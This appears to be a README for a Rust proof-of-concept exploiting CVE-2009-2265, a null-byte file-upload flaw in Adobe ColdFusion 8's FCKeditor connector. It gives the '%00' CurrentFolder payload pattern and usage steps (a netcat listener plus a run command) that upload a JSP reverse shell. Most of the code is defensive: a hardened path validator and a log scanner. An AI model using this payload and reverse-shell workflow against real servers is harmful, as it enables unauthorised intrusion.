CVE-2009-2265 - Adobe ColdFusion 8 File Upload RCE

RustSecurity

A Rust implementation of the POC for the CVE-2009-2265 exploit, targeting Adobe ColdFusion 8.

Vulnerability Overview

This vulnerability allows an unauthenticated attacker to upload arbitrary files to a web-accessible directory on a server running Adobe ColdFusion 8, leading to Remote Code Execution (RCE).

Technical Details

  • Vulnerability: Directory Traversal via Null Byte Injection
  • Component: FCKeditor upload.cfm connector
  • Parameter: CurrentFolder
  • Impact: Remote Code Execution (RCE)
  • Affected Software: Adobe ColdFusion 8.0.1 and earlier

Description

The vulnerability exists in the file upload functionality of the FCKeditor component located at /CFIDE/scripts/ajax/FCKeditor/editor/filemanager/connectors/cfm/upload.cfm. The CurrentFolder HTTP GET parameter is not properly sanitized, allowing for a null byte (%00) injection attack.

By crafting a request where the CurrentFolder parameter is set to /<filename>.jsp%00, an attacker can bypass the server-side extension checks. The underlying system (often Java) interprets the null byte as the end of the string, treating the filename as <filename>.jsp. This allows the attacker to upload a malicious JSP file. The server saves this file to a publicly accessible directory (/userfiles/file/), from where it can be executed by simply accessing its URL.
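The bug class described above is an extension check applied to the wrong string: the uploaded file's name is validated, but the CurrentFolder value is trusted, and the path handed to the native file API is cut short at the first NUL. As an added example (not code from the RustSecurity PoC, ColdFusion or FCKeditor), the following Rust emulates that flawed check and places a hardened version beside it. The upload root is the directory named in this write-up; the extension allowlist, the function names and the sample inputs are assumptions made for the example.

```rust
// Added example, not code from the RustSecurity PoC or from ColdFusion/FCKeditor:
// an emulation of the flawed extension check beside a hardened replacement.
// UPLOAD_ROOT is the directory named in the write-up; the allowlist is assumed.
const UPLOAD_ROOT: &str = "/userfiles/file";
const ALLOWED_EXT: &[&str] = &["jpg", "jpeg", "gif", "png", "txt"];

/// Minimal percent-decoder (std only). Malformed escapes are kept verbatim.
fn percent_decode(s: &str) -> String {
    let bytes = s.as_bytes();
    let mut out = Vec::with_capacity(bytes.len());
    let mut i = 0;
    while i < bytes.len() {
        if bytes[i] == b'%' && i + 2 < bytes.len() {
            let hex = &bytes[i + 1..i + 3];
            if hex.iter().all(|b| b.is_ascii_hexdigit()) {
                // Both bytes are ASCII hex digits, so neither unwrap can fail here.
                let v = u8::from_str_radix(std::str::from_utf8(hex).unwrap(), 16).unwrap();
                out.push(v);
                i += 3;
                continue;
            }
        }
        out.push(bytes[i]);
        i += 1;
    }
    String::from_utf8_lossy(&out).into_owned()
}

/// Extension of the last path segment, if any.
fn extension(path: &str) -> Option<&str> {
    path.rsplit('/').next()?.rsplit_once('.').map(|(_, ext)| ext)
}

/// Emulates the vulnerable behaviour described in the write-up: only the uploaded
/// file's own extension is checked, CurrentFolder is trusted, and the path that
/// reaches the native file API is truncated at the first NUL.
fn vulnerable_save_path(current_folder: &str, upload_name: &str) -> Option<String> {
    let ext = extension(upload_name)?.to_ascii_lowercase();
    if !ALLOWED_EXT.contains(&ext.as_str()) {
        return None;
    }
    let joined = format!("{}{}{}", UPLOAD_ROOT, percent_decode(current_folder), upload_name);
    Some(joined.split('\0').next().unwrap().to_string())
}

/// Hardened form: decode first, reject NUL/control bytes, residual escapes,
/// separators in the file name and traversal segments, then check the
/// extension of the path that will actually be written.
fn hardened_save_path(current_folder: &str, upload_name: &str) -> Result<String, &'static str> {
    let folder = percent_decode(current_folder);
    let name = percent_decode(upload_name);
    for part in [&folder, &name] {
        if part.bytes().any(|b| b < 0x20 || b == 0x7f) {
            return Err("NUL or control byte in path component");
        }
        if part.contains('%') {
            return Err("residual percent-escape (possible double encoding)");
        }
        if part.contains('\\') {
            return Err("backslash in path component");
        }
    }
    if name.contains('/') {
        return Err("path separator in file name");
    }
    if folder.split('/').any(|seg| seg == "..") {
        return Err("directory traversal in CurrentFolder");
    }
    let mut path = String::from(UPLOAD_ROOT);
    for seg in folder.split('/').filter(|s| !s.is_empty() && *s != ".") {
        path.push('/');
        path.push_str(seg);
    }
    path.push('/');
    path.push_str(&name);
    let ext = extension(&path).ok_or("file name has no extension")?.to_ascii_lowercase();
    if !ALLOWED_EXT.contains(&ext.as_str()) {
        return Err("extension not in allowlist");
    }
    Ok(path)
}

fn main() {
    // Constructed inputs: the folder value follows the pattern described in the write-up.
    println!("{:?}", vulnerable_save_path("/shell.jsp%00", "image.txt"));
    println!("{:?}", hardened_save_path("/shell.jsp%00", "image.txt"));
    println!("{:?}", hardened_save_path("/", "image.txt"));
}
```

The ordering in the hardened version is the point: decode, reject anything that can change meaning at a lower layer (NUL, control bytes, leftover escapes, separators, `..`), build the final path, and only then check the extension of that final path. Checking the client-supplied name first, as the emulated vulnerable version does, validates a string the file system never sees.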

This POC automates the process by generating a JSP reverse shell payload, uploading it using the null byte vulnerability, and triggering it to gain a shell on the target system.

Usage

Follow these steps to compile and run the exploit.

Step 1: Set up a Netcat Listener

Before running the exploit, start a listener on your local machine to catch the incoming reverse shell.

nc -lnvp <attacker-port>

Step 2: Run the Exploit

Execute the compiled binary, providing your local host/port for the reverse shell and the remote target's host/port.

cargo run -- --lhost <LHOST> --lport <LPORT> --rhost <RHOST> --rport <RPORT>

After the script triggers the payload, you should receive a connection on your Netcat listener.
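From the defender's side, the sequence above leaves a recognisable trace in the target's web server access logs: a hit on the upload.cfm connector with %00 in CurrentFolder, followed by a request for a .jsp under /userfiles/file/. The following Rust program is an added example, not part of the RustSecurity PoC; the log lines are constructed in Common Log Format, the path constants come from this write-up, and the script-extension list is an assumption.

```rust
// Added example, not part of the RustSecurity PoC: flags the request pattern
// described in this write-up in web-server access logs (Common Log Format),
// using only the Rust standard library. Log lines are constructed.
const CONNECTOR: &str = "/fckeditor/editor/filemanager/connectors/cfm/upload.cfm";
const UPLOAD_DIR: &str = "/userfiles/file/";
const SCRIPT_EXT: &[&str] = &[".jsp", ".jspx", ".cfm", ".cfc"]; // assumed list

const SAMPLE_LOG: &[&str] = &[
    "198.51.100.7 - - [10/Jul/2009:12:00:01 +0000] \"GET /CFIDE/scripts/ajax/FCKeditor/editor/filemanager/connectors/cfm/upload.cfm?Command=FileUpload&Type=File&CurrentFolder=/ HTTP/1.1\" 200 512",
    "198.51.100.7 - - [10/Jul/2009:12:00:05 +0000] \"POST /CFIDE/scripts/ajax/FCKeditor/editor/filemanager/connectors/cfm/upload.cfm?Command=FileUpload&Type=File&CurrentFolder=/shell.jsp%00 HTTP/1.1\" 200 512",
    "198.51.100.7 - - [10/Jul/2009:12:00:09 +0000] \"GET /userfiles/file/shell.jsp HTTP/1.1\" 200 0",
    "203.0.113.5 - - [10/Jul/2009:12:01:00 +0000] \"GET /index.cfm HTTP/1.1\" 200 4096",
];

#[derive(Debug, PartialEq)]
pub struct Finding {
    pub line_no: usize,
    pub client: String,
    pub reason: &'static str,
}

/// Request target ("/path?query") from the quoted request line of a CLF entry.
fn request_target(line: &str) -> Option<&str> {
    let start = line.find('"')? + 1;
    let end = start + line[start..].find('"')?;
    line[start..end].split(' ').nth(1)
}

/// Raw (still percent-encoded) value of a query parameter, matched case-insensitively.
fn query_param<'a>(target: &'a str, name: &str) -> Option<&'a str> {
    let (_, query) = target.split_once('?')?;
    query.split('&').find_map(|kv| {
        let (k, v) = kv.split_once('=')?;
        if k.eq_ignore_ascii_case(name) { Some(v) } else { None }
    })
}

/// Why a request target is suspicious, or None if it looks benign.
fn classify(target: &str) -> Option<&'static str> {
    let path = target.split('?').next().unwrap_or(target).to_ascii_lowercase();
    if path.ends_with(CONNECTOR) {
        // Upload connector hit: inspect CurrentFolder as it appears on the wire.
        let folder = query_param(target, "CurrentFolder")?.to_ascii_lowercase();
        if folder.contains("%00") {
            return Some("null byte in CurrentFolder (CVE-2009-2265 pattern)");
        }
        if folder.contains("..") || folder.contains("%2e%2e") {
            return Some("directory traversal in CurrentFolder");
        }
        if SCRIPT_EXT.iter().any(|e| folder.contains(*e)) {
            return Some("script extension in CurrentFolder");
        }
        return None;
    }
    if path.starts_with(UPLOAD_DIR) && SCRIPT_EXT.iter().any(|e| path.ends_with(*e)) {
        // Second half of the chain: a server-side script fetched from the upload directory.
        return Some("server-side script requested from upload directory");
    }
    None
}

/// Scans log lines and returns one finding per suspicious request.
pub fn scan(lines: &[&str]) -> Vec<Finding> {
    lines.iter().enumerate().filter_map(|(i, line)| {
        let reason = classify(request_target(line)?)?;
        let client = line.split(' ').next().unwrap_or("").to_string();
        Some(Finding { line_no: i + 1, client, reason })
    }).collect()
}

fn main() {
    for f in scan(SAMPLE_LOG) {
        println!("line {} from {}: {}", f.line_no, f.client, f.reason);
    }
}
```

The two findings on the sample log come from the same client a few seconds apart, which is the correlation worth alerting on: an upload-connector request with an encoded NUL followed by the first execution of a script from the upload directory. Matching the raw percent-encoded value rather than a decoded one is deliberate, since the log records what the server received, and a legitimate folder name never needs %00.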

Disclaimer

This tool is for educational and authorized penetration testing purposes only. Use it responsibly and only on systems you own or have explicit permission to test.